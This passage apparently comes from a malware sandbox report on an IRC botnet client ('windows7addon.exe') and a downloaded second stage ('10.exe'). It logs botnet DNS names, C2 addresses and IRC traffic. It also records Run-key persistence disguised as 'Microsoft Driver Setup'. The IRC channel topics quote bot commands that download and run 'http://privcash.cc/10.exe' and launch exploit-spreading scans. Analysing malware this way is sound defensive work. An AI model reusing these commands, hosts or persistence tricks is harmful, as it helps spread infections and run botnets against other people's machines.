login.ipwhois.org.uk (very big botnet)

5.c) windows7addon.exe – Network Activity – DNS Queries:

Name                   Query Type   Query Result    Successful   Protocol
login.ipwhois.org.uk   DNS_TYPE_A   111.68.19.104   1
login.ipwhois.co.uk    DNS_TYPE_A   111.68.19.104   1
www.pr0.net            DNS_TYPE_A   64.59.116.150   1

– IRC Conversations:

111.68.19.104:47221
Nick: [00_AUT_XP_1270214]
Username: SP3-601
Joined Channel: #russi
Channel Topic for Channel #russi: “.asc -S -s|.http http://privcash.cc/10.exe|.asc exp_all 15 5 0 -a -r -e -s|.asc exp_all 20 5 0 -b -r -e -s|.asc exp_all 20 5 0 -c -e -s”
Private Message to Channel #xxs: “HTTP SET http://privcash.cc/10.exe”

Memory Modifications

There was a new process created in the system:
Process Name         Process Filename              Main Module Size
windows7addon.exe    %Windir%\windows7addon.exe    344.064 bytes

Registry Modifications

The following Registry Keys were created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = “%Windir%\windows7addon.exe”

so that windows7addon.exe runs every time Windows starts
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = “%Windir%\windows7addon.exe”

so that windows7addon.exe runs every time Windows starts

Other details

The following ports were open in the system:
Port   Protocol   Process
1055   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1057   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1058   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1059   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1391   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1392   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1393   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1394   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1395   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1396   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1397   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1398   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1399   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1400   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1401   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1402   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1403   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1404   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1405   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1406   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1407   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1408   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1409   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1410   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1411   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1412   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1413   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1414   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1415   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1416   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1417   TCP        windows7addon.exe (%Windir%\windows7addon.exe)
1418   TCP        windows7addon.exe (%Windir%\windows7addon.exe)

Remote Host     Port Number
111.68.19.104   47221

The data identified by the following URL was then requested from the remote web server:
http://www.pr0.net/deny2/azenv.php

NICK [00_USA_XP_9974434]
MODE [00_USA_XP_9974434] -ix
JOIN #russi
PRIVMSG #xxs :HTTP SET http://privcash.cc/10.exe
USER SP2-810 * 0 :COMPUTERNAME

10.exe analysis

Unknown Connections
Host By Name:
Requested Host: server1.unibaq.com
Resulting Address: 212.95.47.105
Requested Host: home-off-d5f0ac
Resulting Address: 172.16.2.34
Connection Established: 0
Socket: 0
UDP Connections
Send Datagram
Remote Address 212.95.47.105
Remote Port: 7002
Size: 7
Remote Address 212.95.47.105
Remote Port: 7002
Size: 3
Remote Address 212.95.47.105
Remote Port: 7002
Size: 43
Receive Datagram
Local Port: 0
Remote Address 212.95.47.105
Remote Port: 7002
Size: 0
Local Port: 0
Remote Address 212.95.47.105
Remote Port: 7002
Size: 8
Local Port: 0
Remote Address 212.95.47.105
Remote Port: 7002
Size: 3

Transport Protocol: UDP
Remote Address: 212.95.47.105
Remote Port: 7002
Protocol: Unknown
Connection Established: 1
Socket: 2736